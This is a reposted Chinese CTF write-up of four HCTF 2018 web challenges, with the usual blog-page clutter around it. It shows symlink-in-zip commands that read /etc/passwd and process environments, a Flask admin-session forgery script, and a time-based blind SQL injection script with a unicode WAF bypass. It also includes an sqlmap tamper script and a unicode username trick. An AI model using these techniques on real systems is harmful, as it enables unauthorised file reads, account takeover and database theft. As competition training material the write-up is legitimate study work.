hctf2018wp复现

最新推荐文章于 2023-10-20 19:02:12 发布
最新推荐文章于 2023-10-20 19:02:12 发布
阅读量256 收藏
点赞数
文章标签: python php 数据库
原文链接:http://www.cnblogs.com/afanti/p/9949660.html
版权

1、bottle

登陆网站后存在提交url的地方

 

测试发生存在如下paload,知识点:1、crlf 2、写一个网站开发的端口小于80,浏览器就不会跳转能执行js(payload只能在火狐浏览器执行):

 验证码部分可以生成1-10000的Md5值 ,构造如下payload:

下面这个图就是打到自己的cookie。如果将这个payload提交到url那里,也就是xss bot存在的地方 就能打到管理员的cookie:

 2、hide and seek

软链漏洞:

ln -s /etc/passwd 1.txt
zip -y 1.zip 1.txt
就能得到/etc/passwd源码
ln -s /proc/self/environ 1.txt
zip -y 1.zip 1.txt
得到配置
ln -s /app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py 1.txt
zip -y 1.zip 1.txt
把1.zip上传就能拿到源码

当已知flask的secret_key已知时就能伪造管理员的session
random.seed(uuid.getnode()) app = Flask(__name__) app.config['SECRET_KEY'] = str(random.random()*100)
得到secret_key=11.935137566861131

伪造admin session的脚本:
import hmac
from hashlib import sha1
from itsdangerous import *

def session_serializer(secret_key):
    signer_kwargs = dict(
        key_derivation='hmac',
        digest_method=sha1
    )
    Serializer = URLSafeTimedSerializer(secret_key, salt='cookie-session',
                                  signer_kwargs=signer_kwargs)
    data = {'username': 'admin'}
    return Serializer.dumps(data)

if __name__ == '__main__':
    secret_key = '11.935137566861131'
    print session_serializer(secret_key)

该cookie通过.分割,分成了三部分:内容序列化+时间+防篡改值https://www.aliyun.com/jiaocheng/491548.html

3、kzone学到的知识点

json_decode可以解析\u0020这样的unicode编码从而绕过waf

 

注入的时候如果存在大小写敏感可以用binary区分

脚本:

#!/usr/bin/python
#!coding:utf-8#
# xishir
import requests
import time
import datetime

#hctf{4526a8cbd741b3f790f95ad32c2514b9}

ss = "{}_0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-+"
r = requests.session()
url = "http://kzone.2018.hctf.io/admin/"
#url="http://127.0.0.1/hctf/www/admin/"

union = '\u00'+str(hex(ord('u')))[2:]+'nion'
sleep = '\u00'+str(hex(ord('s')))[2:]+'leep'
ascii = '\u00'+str(hex(ord('a')))[2:]+'scii'
ok = '\u00'+str(hex(ord('=')))[2:]
substr = '\u00'+str(hex(ord('s')))[2:]+'ubstr'
over = '\u00'+str(hex(ord('#')))[2:]
blank = "/**/"
orr = '\u00'+str(hex(ord('o')))[2:]+'r'

flag=""
for i in range(1,50):
    print i
    for j in ss:
        payload = "admin' and (substr((select binary F1a9 from F1444g limit 1),"+str(i)+",1)='"+str(j)+"') and sleep(4) and 1='1"

        payload = payload.replace('sleep',sleep)
        payload = payload.replace('union',union)
        payload = payload.replace('=',ok)
        payload = payload.replace('#',over)
        payload = payload.replace(' ',blank)
        payload = payload.replace('ascii',ascii)
        payload = payload.replace('substr',substr)
        payload = payload.replace('or',orr)

        jsons = '{"admin_user":"'+payload+'","admin_pass":"3b30a11aaba222edd6e704e9959b94643ed4ffd9"}'

        cookie={"PHPSESSID":"t0k91etf5fecbi4t25d7hprtm3",
        "islogin":"1",
        "login_data":jsons}

        t1=time.time()
        r1 = r.get("http://kzone.2018.hctf.io",cookies=cookie)
        t2=time.time()
        #print t2
        if (t2-t1)>4:
            #print "aaaaaaaa"
            flag+=str(j)
            print i,flag
            break

通过sqlmap注入看flagpig的文章:https://xz.aliyun.com/t/3245#toc-4

a.txt的数据包:注入的位置用*号代替

POST /admin/list.php HTTP/1.1
Host: kzone.2018.hctf.io
Content-Length: 33
Cache-Control: max-age=0
Origin: http://kzone.2018.hctf.io
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://kzone.2018.hctf.io/admin/login.php
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.741104145.1542009847; _gid=GA1.2.1399152972.1542009847; PHPSESSID=07hcqdlsdk80c1o2bgjp5r32e3;; islogin=1; login_data=*
Connection: close

user=11111&pass=11111&login=Login

hctf.py脚本放到tamper目录下

#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    data = '''{"admin_user":"admin%s","admin_pass":65};'''
    payload = payload.lower()
    payload = payload.replace('u', '\u0075')
    payload = payload.replace('o', '\u006f')
    payload = payload.replace('i', '\u0069')
    payload = payload.replace('\'','\u0027')
    payload = payload.replace('"', '\u0022')
    payload = payload.replace(' ', '\u0020')
    payload = payload.replace('s', '\u0073')
    payload = payload.replace('#', '\u0023')
    payload = payload.replace('>', '\u003e')
    payload = payload.replace('<', '\u003c')
    payload = payload.replace('-', '\u002d')
    payload = payload.replace('=', '\u003d')
    payload = payload.replace('f1', 'F1')
    return data % payload

sqlmap -r a.txt --tamper=hctf --dbms=mysql --thread=10 --technique=B --not-string="window.location" -v3 -D hctf_kouzone -T F1444g -C F1a9 --dump

出数据

 

https://www.anquanke.com/post/id/163958

 4、admin

存在flask伪造admin的解法。https://www.anquanke.com/post/id/164086

def strlower(username):
    username = nodeprep.prepare(username)
    return username

unicode安全问题

 http://blog.lnyas.xyz/?p=1411

注册一个ᴬdmin账号
登陆ᴬdmin,发现页面显示Admin
修改密码,退出登录

参考链接:

https://www.jianshu.com/p/8f5ba751aa0f

https://xz.aliyun.com/t/3255#toc-7

http://wiki.ioin.in/post/group/18NJ

转载于:https://www.cnblogs.com/afanti/p/9949660.html

weixin_30274627
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU [HCTF 2018]Hideandseek
Jay17的博客
09-16 616
BUU [HCTF 2018]Hideandseek
BUUCTF [HCTF 2018] Hide and seek
Senimo
01-12 1046
BUUCTF [HCTF 2018] Hide and seek 考点: 软连接读取任意文件 Flask伪造session /proc/self/environ文件获取当前进程的环境变量列表 random.seed()生成的伪随机数种子 MAC地址存放在/sys/class/net/eth0/address文件 启动环境: 信息中心,登陆后查看更多信息,导航栏上内容并不会跳转 尝试登陆: 以为是弱密码,但发现任意用户密码均可登陆,登陆后存在上传点 首先上传正常的txt文件: 得到回显: 需要上传
[HCTF 2018]admin (三种解法详细详解)
记录学习,一起进步
01-17 2429
[HCTF 2018]admin
[HCTF 2018] Hide and seek(buuctf),Unzip(ctfshow)
wwwwyyyrre的博客
10-20 284
考核完对python软连接还是不熟悉,把这两道题在做一下。
[HCTF 2018]admin
Knsec
05-18 3115
[HCTF 2018]admin
Wp.rar_wp
09-14
标题中的"Wp.rar_wp"可能是指一个名为"Wp"的RAR压缩文件,后缀"_wp"可能是用户为了标记或区分该文件而添加的自定义标识。这个压缩包内容与但丁滤波器设计有关,是一种在信号处理领域广泛应用的技术。 在描述中提到...
mingyue.exe wp
03-08
标题中的"mingyue.exe wp"可能是指一个特定的程序或者命令行操作,但没有足够的上下文来详细解释它的具体含义。不过,我们可以基于提供的描述和标签内容来探讨一些相关的IT知识点。 首先,标签"wp"可能是...
wp实现一键锁屏功能
04-04
在WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
WP Rocket v3.2.5 
02-23
wp-rocket是WordPress专业的本地缓存的神器,可以优化你的JS CSS文件结构减少多次请求达到优化速度的目的,还集成了图片延迟加载对最求极致加速的用户不错的选择,通过使用这个插件,能使得你的WordPress博客将显著...
BUUCTF--[HCTF 2018]Hideandseek
qq_46263951的博客
08-20 372
帐号登录后是一个上传ZIP文件 上传一个.ZIP文件后发现他会显示文件的内容 可能是有文件读取,我们创建一个软链接(类似windows的快捷方式)指向一个服务器上的文件,尝试是否可以读取 aliang@aliang:~/Desktop# ln -s /etc/passwd passwd aliang@aliang:~/Desktop# zip -y passwd.zip passwd adding: passwd (stored 0%) 上传后发现可以成功读取到/etc/passwd的...
[HCTF 2018]Hideandseek
Sk1y的博客
08-12 514
知识点:flask-session伪造,文件读取,mac地址查询
[HCTF 2018]admin三种解法
u011250160的博客
12-14 5739
打开题目有两个选项以及一个提示信息 判断我们是要以admin的身份登录 这样的话肯定是对login页面进行一番鼓捣 先弱口令爆破一波,因为是个弱口令(123),爆破也能爆破出来 然后这个题就结束了(太tm出乎意料了)… 弱口令不行的话就试试sql注入以及ssti注入 尝试抓包修改自己的角色(实战中真碰到过) 以上就是常规思路 当然这个题不该设个弱口令在那 看下其他的解法 解法一:session伪造 随便注册个账号登录发现新大陆 在change password页面源码发现源码 去github下载源码
2022NCTF的部分wp及复现
v2ish1yan的博客
12-14 527
2022NCTF的部分wp
BUUCTF--[CISCN2019 华东南赛区]Web4
qq_46263951的博客
07-27 580
Jwt认识与攻击
[CISCN2019 华东南赛区]Web4 FLASK的session伪造
qq_54929891的博客
05-24 557
进入网站后点击read something看见一个疑似远程文件泄露 尝试了一下伪协议filter没有反应,file被禁用了 到这里我就卡住了,我想不到还有什么可以远程读取文件的了 学习得知大佬们一看这个路由就不像是php的,于是盲猜是python的FLASK框架,利用load_file来读取源文件(我查不到这个读取的来源,不理解为啥是这个) 可以打开etc/passwd,从最后一行可以看到最后一个用户执行了/app目录下的一个/bin/ash命令,也就意味着我们当前在/app目录的上..
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 613
[第五空间 2021] wp
2018年美亚杯wp
最新发布
12-23
2018年美亚杯wp(世界杯预选赛)是一场激动人心的比赛。在这次比赛中,来自美洲和亚洲的国家队齐聚一堂,争夺着参加世界杯的资格。比赛分为几个阶段,包括小组赛、淘汰赛和最终决赛。在小组赛阶段,各个国家队都...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值